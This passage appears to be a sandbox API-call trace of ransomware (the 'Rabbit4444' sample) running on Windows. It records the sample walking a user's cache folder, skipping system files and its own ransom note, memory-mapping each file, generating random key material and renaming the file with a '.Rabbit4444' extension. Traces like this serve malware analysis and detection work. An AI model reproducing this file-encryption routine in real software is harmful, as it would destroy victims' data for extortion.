(lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="..") returned 1 [0068.297] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="windows") returned -1 [0068.298] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="bootmgr") returned -1 [0068.298] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="pagefile.sys") returned -1 [0068.298] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="boot") returned -1 [0068.298] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="ids.txt") returned -1 [0068.298] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="NTUSER.DAT") returned -1 [0068.298] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}" | out: lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}") returned="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}" [0068.298] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", dwFileAttributes=0x0) returned 1 [0068.298] lstrlenW (lpString="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}") returned 38 [0068.298] lstrlenW (lpString="Rabbit4444") returned 10 [0068.298] lstrcmpiW (lpString1="6CA16BC9D}", lpString2="Rabbit4444") returned -1 [0068.298] lstrlenW (lpString=".dll") returned 4 [0068.298] lstrcmpiW (lpString1="C9D}", lpString2=".dll") returned 1 [0068.298] lstrlenW (lpString=".lnk") returned 4 [0068.298] lstrcmpiW (lpString1="C9D}", lpString2=".lnk") returned 1 [0068.298] lstrlenW (lpString=".ini") returned 4 [0068.298] lstrcmpiW (lpString1="C9D}", lpString2=".ini") returned 1 [0068.298] lstrlenW (lpString=".sys") returned 4 [0068.298] lstrcmpiW (lpString1="C9D}", lpString2=".sys") returned 1 [0068.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a75f28ed-cbc6-4878-a664-edd6ca16bc9d}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.299] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.299] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15960943584) returned 1 [0068.299] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0068.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0068.299] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.300] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.303] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15961357232) returned 1 [0068.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0068.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0068.303] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.303] CloseHandle (hObject=0x29c) returned 1 [0068.303] CloseHandle (hObject=0x280) returned 1 [0068.303] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}.Rabbit4444") returned 156 [0068.303] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a75f28ed-cbc6-4878-a664-edd6ca16bc9d}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a75f28ed-cbc6-4878-a664-edd6ca16bc9d}.rabbit4444"), dwFlags=0x1) returned 1 [0068.304] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b7712f1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b7712f1, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A8C02D67-E326-46F5-BCFE-ED755438157B}", cAlternateFileName="{A8C02~1")) returned 1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="Rabbit4444.exe") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2=".") returned 1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="..") returned 1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="windows") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="bootmgr") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="pagefile.sys") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="boot") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="ids.txt") returned -1 [0068.304] lstrcmpiW (lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}", lpString2="NTUSER.DAT") returned -1 [0068.305] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A8C02D67-E326-46F5-BCFE-ED755438157B}" | out: lpString1="{A8C02D67-E326-46F5-BCFE-ED755438157B}") returned="{A8C02D67-E326-46F5-BCFE-ED755438157B}" [0068.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A8C02D67-E326-46F5-BCFE-ED755438157B}", dwFileAttributes=0x0) returned 1 [0068.305] lstrlenW (lpString="{A8C02D67-E326-46F5-BCFE-ED755438157B}") returned 38 [0068.305] lstrlenW (lpString="Rabbit4444") returned 10 [0068.305] lstrcmpiW (lpString1="55438157B}", lpString2="Rabbit4444") returned -1 [0068.305] lstrlenW (lpString=".dll") returned 4 [0068.305] lstrcmpiW (lpString1="57B}", lpString2=".dll") returned 1 [0068.305] lstrlenW (lpString=".lnk") returned 4 [0068.305] lstrcmpiW (lpString1="57B}", lpString2=".lnk") returned 1 [0068.305] lstrlenW (lpString=".ini") returned 4 [0068.305] lstrcmpiW (lpString1="57B}", lpString2=".ini") returned 1 [0068.305] lstrlenW (lpString=".sys") returned 4 [0068.305] lstrcmpiW (lpString1="57B}", lpString2=".sys") returned 1 [0068.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A8C02D67-E326-46F5-BCFE-ED755438157B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a8c02d67-e326-46f5-bcfe-ed755438157b}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.305] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.306] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15961629200) returned 1 [0068.306] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0068.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0068.306] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.307] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.308] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15961900872) returned 1 [0068.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0068.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0068.308] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.309] CloseHandle (hObject=0x29c) returned 1 [0068.309] CloseHandle (hObject=0x280) returned 1 [0068.309] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A8C02D67-E326-46F5-BCFE-ED755438157B}.Rabbit4444") returned 156 [0068.309] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A8C02D67-E326-46F5-BCFE-ED755438157B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a8c02d67-e326-46f5-bcfe-ed755438157b}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A8C02D67-E326-46F5-BCFE-ED755438157B}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a8c02d67-e326-46f5-bcfe-ed755438157b}.rabbit4444"), dwFlags=0x1) returned 1 [0068.310] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b5a769e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b5a769e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44fdc101, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", cAlternateFileName="{AC0F2~1")) returned 1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="Rabbit4444.exe") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2=".") returned 1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="..") returned 1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="windows") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="bootmgr") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="pagefile.sys") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="boot") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="ids.txt") returned -1 [0068.310] lstrcmpiW (lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}", lpString2="NTUSER.DAT") returned -1 [0068.310] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{AC0F2DEC-6E17-4771-9780-2942696DCB74}" | out: lpString1="{AC0F2DEC-6E17-4771-9780-2942696DCB74}") returned="{AC0F2DEC-6E17-4771-9780-2942696DCB74}" [0068.310] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC0F2DEC-6E17-4771-9780-2942696DCB74}", dwFileAttributes=0x0) returned 1 [0068.311] lstrlenW (lpString="{AC0F2DEC-6E17-4771-9780-2942696DCB74}") returned 38 [0068.311] lstrlenW (lpString="Rabbit4444") returned 10 [0068.311] lstrcmpiW (lpString1="2696DCB74}", lpString2="Rabbit4444") returned -1 [0068.311] lstrlenW (lpString=".dll") returned 4 [0068.311] lstrcmpiW (lpString1="B74}", lpString2=".dll") returned 1 [0068.311] lstrlenW (lpString=".lnk") returned 4 [0068.311] lstrcmpiW (lpString1="B74}", lpString2=".lnk") returned 1 [0068.311] lstrlenW (lpString=".ini") returned 4 [0068.311] lstrcmpiW (lpString1="B74}", lpString2=".ini") returned 1 [0068.311] lstrlenW (lpString=".sys") returned 4 [0068.311] lstrcmpiW (lpString1="B74}", lpString2=".sys") returned 1 [0068.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC0F2DEC-6E17-4771-9780-2942696DCB74}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ac0f2dec-6e17-4771-9780-2942696dcb74}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.311] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.311] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15962220887) returned 1 [0068.312] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0068.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0068.312] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.313] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.314] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15962497225) returned 1 [0068.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0068.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0068.314] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.314] CloseHandle (hObject=0x29c) returned 1 [0068.315] CloseHandle (hObject=0x280) returned 1 [0068.315] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC0F2DEC-6E17-4771-9780-2942696DCB74}.Rabbit4444") returned 156 [0068.315] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC0F2DEC-6E17-4771-9780-2942696DCB74}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ac0f2dec-6e17-4771-9780-2942696dcb74}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC0F2DEC-6E17-4771-9780-2942696DCB74}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ac0f2dec-6e17-4771-9780-2942696dcb74}.rabbit4444"), dwFlags=0x1) returned 1 [0068.315] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b1edbb5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b1edbb5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", cAlternateFileName="{AC7B9~1")) returned 1 [0068.315] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.315] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="Rabbit4444.exe") returned -1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2=".") returned 1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="..") returned 1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="windows") returned -1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="bootmgr") returned -1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="pagefile.sys") returned -1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="boot") returned -1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="ids.txt") returned -1 [0068.316] lstrcmpiW (lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", lpString2="NTUSER.DAT") returned -1 [0068.316] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}" | out: lpString1="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}") returned="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}" [0068.316] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}", dwFileAttributes=0x0) returned 1 [0068.316] lstrlenW (lpString="{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}") returned 38 [0068.316] lstrlenW (lpString="Rabbit4444") returned 10 [0068.316] lstrcmpiW (lpString1="490D0C9EA}", lpString2="Rabbit4444") returned -1 [0068.316] lstrlenW (lpString=".dll") returned 4 [0068.316] lstrcmpiW (lpString1="9EA}", lpString2=".dll") returned 1 [0068.316] lstrlenW (lpString=".lnk") returned 4 [0068.316] lstrcmpiW (lpString1="9EA}", lpString2=".lnk") returned 1 [0068.316] lstrlenW (lpString=".ini") returned 4 [0068.316] lstrcmpiW (lpString1="9EA}", lpString2=".ini") returned 1 [0068.316] lstrlenW (lpString=".sys") returned 4 [0068.316] lstrcmpiW (lpString1="9EA}", lpString2=".sys") returned 1 [0068.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ac7b9de5-2bb7-4d1f-8d6b-195490d0c9ea}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.317] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.317] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15962763392) returned 1 [0068.317] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0068.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.317] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.320] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.321] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101518) returned 1 [0068.322] CryptGenRandom (in: hProv=0x101518, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0068.322] CryptReleaseContext (hProv=0x101518, dwFlags=0x0) returned 1 [0068.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.323] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15963367990) returned 1 [0068.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0068.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.323] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.323] CloseHandle (hObject=0x29c) returned 1 [0068.323] CloseHandle (hObject=0x280) returned 1 [0068.323] wsprintfW (in: 